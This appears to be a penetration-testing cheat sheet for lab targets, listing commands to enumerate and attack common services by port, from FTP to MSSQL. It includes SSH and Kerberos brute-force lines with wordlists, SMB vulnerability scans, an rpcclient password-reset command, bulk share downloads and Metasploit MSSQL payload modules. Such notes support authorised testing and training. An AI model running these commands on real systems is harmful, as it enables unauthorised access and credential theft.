02 Port Enumeration

Port 21 - FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5

Port 22 - SSH

Try to log in with default/simple accounts: admin:admin, root:root, user:password
Brute Force
BruteForce:
patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5
medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5

Port 25 - SMTP

nc -nvv 10.11.1.5 25
HELO foo<cr><lf>
telnet 10.11.1.5 25
VRFY root
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.5
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.5

Port 53 - DNS

dnsrecon -d 10.10.10.192

Port 88 - Kerberos

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" 10.11.1.5
GitHub - TarlogicSecurity/kerbrute: An script to perform kerberos bruteforcing by using impacket
python kerbrute.py -dc-ip 10.11.1.5 -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

Port 110 - Pop3

telnet 10.11.1.5
PASS abcd1234
or:
USER fkclai
PASS abcd1234
# List all emails
list

Port 111 - Rpcbind

rpcinfo -p 10.11.1.5
rpcclient -U "" 10.11.1.5
#rpcclient> srvinfo
#rpcclient> enumdomusers
#rpcclient> querydominfo
#rpcclient> getdompwinfo //password policy
#rpcclient> netshareenum
#rpcclient> enumprivs
#rpcclient> setuserinfo2 <user id> 23 [email protected]

Port 135 - MSRPC

nmap 10.11.1.5 --script=msrpc-enum
rpcdump.py 10.10.10.192 -p 135 >> /tmp/rpc.txt

Port 139/445 - SMB

#Enumeration
smbmap -H 10.11.1.8
smbmap -u "guest" -p "" -H 10.11.1.31
nmap --script smb-enum-shares -p 139,445
enum4linux nest.htb
smbclient -L nest.htb
smbclient -U "r.thompson" -L \\\\10.10.10.182
smbclient -L //10.10.10.192 -N
# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.8
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.8
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.8
nmap --script vuln -p 135,139,445 10.10.10.40
smbmap -u TempUser -p welcome2019 -H nest.htb -R
smbclient \\\\nest.htb\\Data -U TempUser
smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
mask ""
recurse ON
prompt OFF
mget *

Port 389,636 LDAP

ldapsearch -h 10.11.1.8 -p 389 -x -b "dc=fkclai,dc=com"
ldapsearch -x -h 10.11.1.8 -D 'DOMAIN\fkclai' -w 'hash-password'
ldapdomaindump 10.11.1.8 -u 'DOMAIN\fkclai' -p 'hash-password'
windapsearch.py -d abcde.local --dc-ip 10.10.10.175 -U
https://github.com/ropnop/windapsearch

Port 1433 MSSQL

nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.8
#MSF payload
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/scanner/mssql/mssql_login
use exploit/windows/mssql/mssql_payload